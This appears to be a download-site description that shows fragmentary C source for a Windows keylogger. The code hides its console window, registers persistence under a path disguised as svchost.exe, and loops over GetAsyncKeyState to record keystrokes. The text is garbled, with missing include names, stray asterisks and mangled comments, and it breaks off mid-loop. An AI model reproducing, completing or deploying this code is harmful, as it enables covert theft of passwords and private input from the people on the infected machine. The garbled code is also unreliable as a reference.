资 源 简 介
include
include
include
define BUFSIZE 80
int test_key(void);
int create_key(char **);
int get_keys(void);**
int main(void)
{
HWND stealth; /creating stealth (window is not visible)/
AllocConsole();
stealth=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(stealth,0);
int test,create;
test=test_key();/check if key is available for opening/
if (test==2)/create key/
{
char path="c:\%windir%\svchost.exe";/the path in which the file needs to be**/
create=create_key(path);**
}
int t=get_keys();
return t;
}
int get_keys(void)
{
short character;
while(1)
{
for(character=8;character<=222;character++)
{
if(GetAsyncKeyState(character)==-32767)